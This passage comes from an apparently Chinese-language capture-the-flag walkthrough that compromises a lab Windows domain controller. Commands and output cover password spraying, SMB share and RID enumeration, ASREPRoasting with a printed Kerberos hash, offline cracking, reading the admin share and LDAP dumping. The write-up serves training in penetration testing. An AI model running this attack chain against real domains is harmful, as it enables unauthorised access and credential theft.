SOUPEDECODE.LOCAL\\admin:admin STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\charlie:admin STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\administrator:admin STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:admin STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\admin:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [+] SOUPEDECODE.LOCAL\\charlie:charlie \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\administrator:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:charlie STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\admin:administrator STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\administrator:administrator STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:administrator STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\admin:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\administrator:wreed11 STATUS_LOGON_FAILURE \nSMB         192.168.10.101  445    DC01             [-] SOUPEDECODE.LOCAL\\wreed11:wreed11 STATUS_LOGON_FAILURE <\/code><\/pre>\n<p>\u53ea\u53d1\u73b0\u4e00\u4e2a\u51ed\u8bc1\uff1a<code>charlie:charlie <\/code>.<\/p>\n<h3>\u679a\u4e3e\u4fe1\u606f<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -d &#039;SOUPEDECODE.LOCAL&#039; -u charlie -p charlie --shares\nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [+] SOUPEDECODE.LOCAL\\charlie:charlie \nSMB         192.168.10.107  445    DC01             [*] Enumerated shares\nSMB         192.168.10.107  445    DC01             Share           Permissions     Remark\nSMB         192.168.10.107  445    DC01             -----           -----------     ------\nSMB         192.168.10.107  445    DC01             ADMIN$                          Remote Admin\nSMB         192.168.10.107  445    DC01             C$                              Default share\nSMB         192.168.10.107  445    DC01             IPC$            READ            Remote IPC\nSMB         192.168.10.107  445    DC01             NETLOGON        READ            Logon server share \nSMB         192.168.10.107  445    DC01             SYSVOL          READ            Logon server share<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u4f7f\u7528<code>smbmap<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbmap -u charlie -p charlie -d workgroup -H $IP \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          \n\n[+] IP: 192.168.10.107:445      Name: 192.168.10.107            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                READ ONLY       Logon server share \n        SYSVOL                                                  READ ONLY       Logon server share \n[*] Closed 1 connections<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fde\u63a5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\charlie&quot; \/\/$IP\/IPC$\nPassword for [SOUPEDECODE.LOCAL\\charlie]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\nNT_STATUS_NO_SUCH_FILE listing \\*\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\charlie&quot; \/\/$IP\/NETLOGON\nPassword for [SOUPEDECODE.LOCAL\\charlie]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Sat Jun 15 15:21:21 2024\n  ..                                  D        0  Sat Jun 15 15:30:47 2024\n\n                12942591 blocks of size 4096. 10793162 blocks available\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\charlie&quot; \/\/$IP\/SYSVOL  \nPassword for [SOUPEDECODE.LOCAL\\charlie]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Sat Jun 15 15:21:21 2024\n  ..                                  D        0  Sat Jun 15 15:21:21 2024\n  SOUPEDECODE.LOCAL                  Dr        0  Sat Jun 15 15:21:21 2024\n\n                12942591 blocks of size 4096. 10793162 blocks available         \nsmb: \\&gt; cd SOUPEDECODE.LOCAL\\\nsmb: \\SOUPEDECODE.LOCAL\\&gt; ls\n  .                                   D        0  Sat Jun 15 15:30:47 2024\n  ..                                  D        0  Sat Jun 15 15:21:21 2024\n  DfsrPrivate                      DHSr        0  Sat Jun 15 15:30:47 2024\n  Policies                            D        0  Sat Jun 15 15:21:30 2024\n  scripts                             D        0  Sat Jun 15 15:21:21 2024\n\n                12942591 blocks of size 4096. 10793162 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\&gt; cd scripts\\\nsmb: \\SOUPEDECODE.LOCAL\\scripts\\&gt; ls\n  .                                   D        0  Sat Jun 15 15:21:21 2024\n  ..                                  D        0  Sat Jun 15 15:30:47 2024\n\n                12942591 blocks of size 4096. 10793162 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\scripts\\&gt; cd ..\/Policies\\\nsmb: \\SOUPEDECODE.LOCAL\\Policies\\&gt; ls\n  .                                   D        0  Sat Jun 15 15:21:30 2024\n  ..                                  D        0  Sat Jun 15 15:30:47 2024\n  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jun 15 15:21:30 2024\n  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jun 15 15:21:30 2024\n\n                12942591 blocks of size 4096. 10793162 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\Policies\\&gt; cd ..\/DfsrPrivate\\\ncd \\SOUPEDECODE.LOCAL\\DfsrPrivate\\: NT_STATUS_ACCESS_DENIED<\/code><\/pre>\n<p>\u6ca1\u53d1\u73b0\u5565\u3002\u3002\u3002\u3002<\/p>\n<h3>RID\u7206\u7834\u7528\u6237<\/h3>\n<blockquote>\n<p>RID\uff08Relative Identifier\uff09\u662f Windows \u5b89\u5168\u6807\u8bc6\u7b26\uff08SID\uff09\u7684\u672b\u6bb5\u6570\u5b57\uff0c\u7528\u4e8e\u5728\u57df\u6216\u672c\u5730\u7cfb\u7edf\u5185\u552f\u4e00\u6807\u8bc6\u7528\u6237\u6216\u7ec4\u3002<\/p>\n<p><strong>RID brute\uff08RID \u66b4\u529b\u679a\u4e3e\uff09<\/strong> \u6307\u4e00\u79cd\u653b\u51fb\u6280\u672f\uff0c\u901a\u8fc7\u81ea\u52a8\u5316\u5de5\u5177<strong>\u7cfb\u7edf\u6027\u5730\u904d\u5386\u6240\u6709\u53ef\u80fd\u7684 RID \u503c<\/strong>\uff08\u5982\u4ece 500 \u5230\u6570\u4e07\uff09\uff0c\u63a2\u6d4b\u7cfb\u7edf\u4e2d\u5b58\u5728\u7684\u7528\u6237\u6216\u7ec4\u8d26\u6237\uff0c\u5c24\u5176\u9488\u5bf9<strong>\u9690\u85cf\u8d26\u6237\u6216\u6743\u9650\u88ab\u7be1\u6539\u7684\u8d26\u6237<\/strong>\u3002<\/p>\n<\/blockquote>\n<h4>\u5de5\u5177\u4e00\uff1anetexec<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -d &#039;SOUPEDECODE.LOCAL&#039; -u &#039;charlie&#039; -p &#039;charlie&#039; --rid-brute\nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [+] SOUPEDECODE.LOCAL\\charlie:charlie \nSMB         192.168.10.107  445    DC01             498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             500: SOUPEDECODE\\Administrator (SidTypeUser)\nSMB         192.168.10.107  445    DC01             501: SOUPEDECODE\\Guest (SidTypeUser)\nSMB         192.168.10.107  445    DC01             502: SOUPEDECODE\\krbtgt (SidTypeUser)\nSMB         192.168.10.107  445    DC01             512: SOUPEDECODE\\Domain Admins (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             513: SOUPEDECODE\\Domain Users (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             514: SOUPEDECODE\\Domain Guests (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             515: SOUPEDECODE\\Domain Computers (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             516: SOUPEDECODE\\Domain Controllers (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             517: SOUPEDECODE\\Cert Publishers (SidTypeAlias)\nSMB         192.168.10.107  445    DC01             518: SOUPEDECODE\\Schema Admins (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             519: SOUPEDECODE\\Enterprise Admins (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             520: SOUPEDECODE\\Group Policy Creator Owners (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             521: SOUPEDECODE\\Read-only Domain Controllers (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             522: SOUPEDECODE\\Cloneable Domain Controllers (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             525: SOUPEDECODE\\Protected Users (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             526: SOUPEDECODE\\Key Admins (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             527: SOUPEDECODE\\Enterprise Key Admins (SidTypeGroup)\nSMB         192.168.10.107  445    DC01             553: SOUPEDECODE\\RAS and IAS Servers (SidTypeAlias)\nSMB         192.168.10.107  445    DC01             571: SOUPEDECODE\\Allowed RODC Password Replication Group (SidTypeAlias)\nSMB         192.168.10.107  445    DC01             572: SOUPEDECODE\\Denied RODC Password Replication Group (SidTypeAlias)\nSMB         192.168.10.107  445    DC01             1000: SOUPEDECODE\\DC01$ (SidTypeUser)\nSMB         192.168.10.107  445    DC01             1101: SOUPEDECODE\\DnsAdmins (SidTypeAlias)\n----------------------------------\nSMB         192.168.10.107  445    DC01             2158: SOUPEDECODE\\PC-86$ (SidTypeUser)\nSMB         192.168.10.107  445    DC01             2159: SOUPEDECODE\\PC-87$ (SidTypeUser)\nSMB         192.168.10.107  445    DC01             2160: SOUPEDECODE\\PC-88$ (SidTypeUser)\nSMB         192.168.10.107  445    DC01             2161: SOUPEDECODE\\PC-89$ (SidTypeUser)\nSMB         192.168.10.107  445    DC01             2162: SOUPEDECODE\\PC-90$ (SidTypeUser)\nSMB         192.168.10.107  445    DC01             2164: SOUPEDECODE\\admin (SidTypeUser)<\/code><\/pre>\n<h4>\u5de5\u5177\u4e8c\uff1alookupsid<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-lookupsid &#039;SOUPEDECODE.LOCAL\/charlie:charlie@192.168.10.107&#039;\nImpacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Brute forcing SIDs at 192.168.10.107\n[*] StringBinding ncacn_np:192.168.10.107[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n500: SOUPEDECODE\\Administrator (SidTypeUser)\n501: SOUPEDECODE\\Guest (SidTypeUser)\n502: SOUPEDECODE\\krbtgt (SidTypeUser)\n512: SOUPEDECODE\\Domain Admins (SidTypeGroup)\n513: SOUPEDECODE\\Domain Users (SidTypeGroup)\n514: SOUPEDECODE\\Domain Guests (SidTypeGroup)\n-------------<\/code><\/pre>\n<h3>ASREPRoasting \u653b\u51fb<\/h3>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/asreproast.html?highlight=AS-REP#asreproast-without-credentials\">https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/asreproast.html?highlight=AS-REP#asreproast-without-credentials<\/a><\/p>\n<p>\u9996\u5148\u662f\u5c1d\u8bd5\u8fdb\u884c\u63d0\u53d6<code>TGS<\/code> \u7968\u8bc1\uff0c\u770b\u770b\u662f\u5426\u542f\u7528\u4e86<strong> <\/strong>Kerberos \u9884\u8ba4\u8bc1****\uff0c\u4f46\u9996\u5148\uff0c\u54b1\u4eec\u8981\u5904\u7406\u4e00\u4e0b\u4e0a\u4e00\u6b65\u5f97\u51fa\u7684\u7528\u6237\u540d\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-lookupsid &#039;SOUPEDECODE.LOCAL\/charlie:charlie@192.168.10.107&#039; &gt; riduser\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat riduser | cut -d&#039;\\&#039; -f2 | cut -d&#039; &#039; -f1 &gt; riduser1<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ impacket-GetNPUsers -usersfile riduser1 -dc-ip $IP &#039;SOUPEDECODE.LOCAL\/charlie:charlie&#039; &gt; log1 \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat log1 | grep -v &quot;[-]&quot;                                                                     \n\n$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:aa70c09e60ebee7fc1673c1879a2d17a$b425889aa396cb62af79319e7d12ead2ebef0dc7dd2da618ff97fa6e660db47b99fcffdecf0aa6cb6b27b07a895f5a1a60c9693cde559a5631466ec10d4d42d852f9c0d2f61fdaa3b5e90dc9ef24907290e6015660b968cdec96997baa92155e26033367235108088514407e68208d0c6dd4fead4a4bfd556c5e05ddf6a4547d8fae35710961676c54e2aae3092a6572de5c16cdab9f213381d6f9258e46a0aab14ff27e15809d6b4f12521dcd14b57acd65286d691e0296da28187c3a882695b8afd276adbbeab6f12e0b8741a5593a178fdc90e63e50911814c511ae3948e250484b1ffe3c5cf28348907641a2b43110ecfa0ed08e<\/code><\/pre>\n<blockquote>\n<ol>\n<li><strong>Kerberos \u9884\u8ba4\u8bc1\u7684\u4f5c\u7528<\/strong><br \/>\nKerberos \u534f\u8bae\u5728\u8ba4\u8bc1\u65f6\u9ed8\u8ba4\u8981\u6c42 \u200b<strong>\u9884\u8ba4\u8bc1\uff08Pre-Authentication\uff09\u200b<\/strong>\u200b\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u5728\u8bf7\u6c42 TGT\uff08\u7968\u636e\u6388\u4e88\u7968\u636e\uff09\u524d\uff0c\u9700\u7528\u5bc6\u7801 Hash \u52a0\u5bc6\u65f6\u95f4\u6233\u53d1\u9001\u7ed9 KDC\uff08\u57df\u63a7\u5236\u5668\uff09\u9a8c\u8bc1<\/li>\n<li>\u82e5\u9a8c\u8bc1\u5931\u8d25\uff08\u5982\u5bc6\u7801\u9519\u8bef\uff09\uff0cKDC \u4f1a\u62d2\u7edd\u8fd4\u56de TGT\uff0c\u5e76\u8bb0\u5f55\u9519\u8bef\u6b21\u6570\uff08\u9632\u66b4\u529b\u7834\u89e3\uff09<\/li>\n<\/ul>\n<\/li>\n<li><strong>\u7981\u7528\u9884\u8ba4\u8bc1\u7684\u98ce\u9669<\/strong><br \/>\n\u82e5\u57df\u7528\u6237\u88ab\u6807\u8bb0 \u200b<strong><code>Do not require Kerberos preauthentication<\/code><\/strong>\u200b\uff08\u5373 <code>UF_DONT_REQUIRE_PREAUTH<\/code> \u5c5e\u6027\uff09\uff1a<\/p>\n<ul>\n<li>\u653b\u51fb\u8005\u65e0\u9700\u5bc6\u7801\u5373\u53ef\u76f4\u63a5\u8bf7\u6c42\u8be5\u7528\u6237\u7684 TGT\u3002<\/li>\n<li>KDC \u4f1a\u8fd4\u56de\u7528\u7528\u6237\u5bc6\u7801 Hash \u52a0\u5bc6\u7684 AS-REP \u54cd\u5e94\uff08\u542b TGT \u548c Session Key\uff09\u6b64\u54cd\u5e94\u53ef\u88ab\u79bb\u7ebf\u7834\u89e3\uff0c\u83b7\u53d6\u7528\u6237\u660e\u6587\u5bc6\u7801\uff08\u5373 <strong>ASREPRoasting \u653b\u51fb<\/strong>\uff09<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<\/blockquote>\n<p>\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat log1 | grep &quot;UF_DONT&quot; | head -n 10\n[-] User Administrator doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User DC01$ doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User bmark0 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User otara1 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User kleo2 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User eyara3 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User pquinn4 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User jharper5 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User bxenia6 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set\n[-] User gmona7 doesn&#039;t have UF_DONT_REQUIRE_PREAUTH set<\/code><\/pre>\n<p>\u5b8c\u7f8e\u7b26\u5408<code>ASREPRoasting \u653b\u51fb<\/code>\u7684\u6761\u4ef6\uff01<\/p>\n<ul>\n<li>\u81f3\u5c11\u4e00\u4e2a\u57df\u7528\u6237\u7981\u7528\u9884\u8ba4\u8bc1\uff08\u9ed8\u8ba4\u672a\u542f\u7528\uff09<\/li>\n<li>\u653b\u51fb\u8005\u9700\u80fd\u4e0e\u57df\u63a7 88 \u7aef\u53e3\uff08Kerberos\uff09\u901a\u4fe1<\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7834\u8bd1\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17\/18\/23 [MD4 HMAC-MD5 RC4 \/ PBKDF2 HMAC-SHA1 AES 128\/128 SSE2 4x])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\ninternet         ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)     \n1g 0:00:00:00 DONE (2025-06-12 11:20) 16.66g\/s 8533p\/s 8533c\/s 8533C\/s angelo..letmein\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n<p>\u5f97\u5230\u4e86\u65b0\u51ed\u8bc1<code>zximena448:internet<\/code>\uff0c\u8fdb\u884c\u65b0\u4e00\u8f6e\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<h4>\u5de5\u5177\u4e00\uff1anetexec<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ netexec smb $IP -d &#039;SOUPEDECODE.LOCAL&#039; -u &#039;zximena448&#039; -p &#039;internet&#039; --shares\nSMB         192.168.10.107  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) \nSMB         192.168.10.107  445    DC01             [+] SOUPEDECODE.LOCAL\\zximena448:internet \nSMB         192.168.10.107  445    DC01             [*] Enumerated shares\nSMB         192.168.10.107  445    DC01             Share           Permissions     Remark\nSMB         192.168.10.107  445    DC01             -----           -----------     ------\nSMB         192.168.10.107  445    DC01             ADMIN$          READ            Remote Admin\nSMB         192.168.10.107  445    DC01             C$              READ,WRITE      Default share\nSMB         192.168.10.107  445    DC01             IPC$            READ            Remote IPC\nSMB         192.168.10.107  445    DC01             NETLOGON        READ            Logon server share \nSMB         192.168.10.107  445    DC01             SYSVOL          READ            Logon server share<\/code><\/pre>\n<h4>\u5de5\u5177\u4e8c\uff1asmbmap<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbmap -u zximena448 -p internet -H $IP -d workgroup\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          \n\n[+] IP: 192.168.10.107:445      Name: 192.168.10.107            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  READ ONLY       Remote Admin\n        C$                                                      READ ONLY       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                READ ONLY       Logon server share \n        SYSVOL                                                  READ ONLY       Logon server share \n[*] Closed 1 connections                                           <\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ smbclient -U &quot;SOUPEDECODE.LOCAL\\zximena448&quot; \/\/$IP\/C$ \nPassword for [SOUPEDECODE.LOCAL\\zximena448]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  $WinREAgent                        DH        0  Sat Jun 15 15:19:51 2024\n  Documents and Settings          DHSrn        0  Sat Jun 15 22:51:08 2024\n  DumpStack.log.tmp                 AHS    12288  Fri Jun 13 02:25:18 2025\n  pagefile.sys                      AHS 1476395008  Fri Jun 13 02:25:18 2025\n  PerfLogs                            D        0  Sat May  8 04:15:05 2021\n  Program Files                      DR        0  Sat Jun 15 13:54:31 2024\n  Program Files (x86)                 D        0  Sat May  8 05:34:13 2021\n  ProgramData                       DHn        0  Sat Jun 15 22:51:08 2024\n  Recovery                         DHSn        0  Sat Jun 15 22:51:08 2024\n  System Volume Information         DHS        0  Sat Jun 15 15:02:21 2024\n  Users                              DR        0  Mon Jun 17 14:31:08 2024\n  Windows                             D        0  Sat Jun 15 15:21:10 2024\n\n                12942591 blocks of size 4096. 10792809 blocks available\n\nsmb: \\&gt; cd \/Users\nsmb: \\Users\\&gt; ls\n  .                                  DR        0  Mon Jun 17 14:31:08 2024\n  ..                                DHS        0  Fri Jun 13 02:27:11 2025\n  Administrator                       D        0  Sat Jun 15 15:56:40 2024\n  All Users                       DHSrn        0  Sat May  8 04:26:16 2021\n  Default                           DHR        0  Sat Jun 15 22:51:08 2024\n  Default User                    DHSrn        0  Sat May  8 04:26:16 2021\n  desktop.ini                       AHS      174  Sat May  8 04:14:03 2021\n  Public                             DR        0  Sat Jun 15 13:54:32 2024\n  zximena448                          D        0  Mon Jun 17 14:30:22 2024\n\n                12942591 blocks of size 4096. 10792623 blocks available\nsmb: \\Users\\&gt; cd zximena448\\\nsmb: \\Users\\zximena448\\&gt; cd desktop\nsmb: \\Users\\zximena448\\desktop\\&gt; ls\n  .                                  DR        0  Mon Jun 17 14:31:24 2024\n  ..                                  D        0  Mon Jun 17 14:30:22 2024\n  desktop.ini                       AHS      282  Mon Jun 17 14:30:22 2024\n  user.txt                            A       33  Wed Jun 12 16:01:30 2024\n\n                12942591 blocks of size 4096. 10792623 blocks available\nsmb: \\Users\\zximena448\\desktop\\&gt; get user.txt\ngetting file \\Users\\zximena448\\desktop\\user.txt of size 33 as user.txt (0.2 KiloBytes\/sec) (average 0.2 KiloBytes\/sec)\nsmb: \\Users\\zximena448\\desktop\\&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ cat user.txt \n2fe79eb0e02ecd4dd2833cfcbbdb504c<\/code><\/pre>\n<h2>\u63d0\u6743<\/h2>\n<h3>LDAP\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u6709\u4e86\u65b0\u7684\u51ed\u8bc1\uff0c\u5c31\u6682\u65f6\u4e0d\u7528\u8003\u8651<code>kerberos<\/code>\u4e86\uff0c\u5c1d\u8bd5\u901a\u8fc7<code>LDAP<\/code>\u6536\u96c6AD\u57df\u7684\u76f8\u5173\u4fe1\u606f\uff0c\u4f7f\u7528\u5230\u4e86\u4e00\u4e2a\u53eb<code>ldapdomaindump<\/code>\u7684\u5de5\u5177\uff1a<\/p>\n<blockquote>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ldap.html#valid-credentials\">https:\/\/book.hacktricks.wiki\/en\/network-services-pentesting\/pentesting-ldap.html#valid-credentials<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ ldapdomaindump $IP -u &#039;SOUPEDECODE.LOCAL\\zximena448&#039; -p internet\n[*] Connecting to host...\n[*] Binding to host\n[+] Bind OK\n[*] Starting domain dump\n[+] Domain dump finished\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC02]\n\u2514\u2500$ ll                                                              \ntotal 94172\n-rw-rw-r-- 1 kali kali       36 Jun 12 05:20 dict\n-rw-rw-r-- 1 kali kali    29016 Jun 12 11:44 domain_computers_by_os.html\n-rw-rw-r-- 1 kali kali    12399 Jun 12 11:44 domain_computers.grep\n-rw-rw-r-- 1 kali kali    28694 Jun 12 11:44 domain_computers.html\n-rw-rw-r-- 1 kali kali   212790 Jun 12 11:44 domain_computers.json\n-rw-rw-r-- 1 kali kali    10182 Jun 12 11:44 domain_groups.grep\n-rw-rw-r-- 1 kali kali    17142 Jun 12 11:44 domain_groups.html\n-rw-rw-r-- 1 kali kali    79554 Jun 12 11:44 domain_groups.json\n-rw-rw-r-- 1 kali kali      247 Jun 12 11:44 domain_policy.grep\n-rw-rw-r-- 1 kali kali     1143 Jun 12 11:44 domain_policy.html\n-rw-rw-r-- 1 kali kali     5255 Jun 12 11:44 domain_policy.json\n-rw-rw-r-- 1 kali kali       71 Jun 12 11:44 domain_trusts.grep\n-rw-rw-r-- 1 kali kali      828 Jun 12 11:44 domain_trusts.html\n-rw-rw-r-- 1 kali kali        2 Jun 12 11:44 domain_trusts.json\n-rw-rw-r-- 1 kali kali   336005 Jun 12 11:44 domain_users_by_group.html\n-rw-rw-r-- 1 kali kali   226805 Jun 12 11:44 domain_users.grep\n-rw-rw-r-- 1 kali kali   471611 Jun 12 11:44 domain_users.html\n-rw-rw-r-- 1 kali kali  2742438 Jun 12 11:44 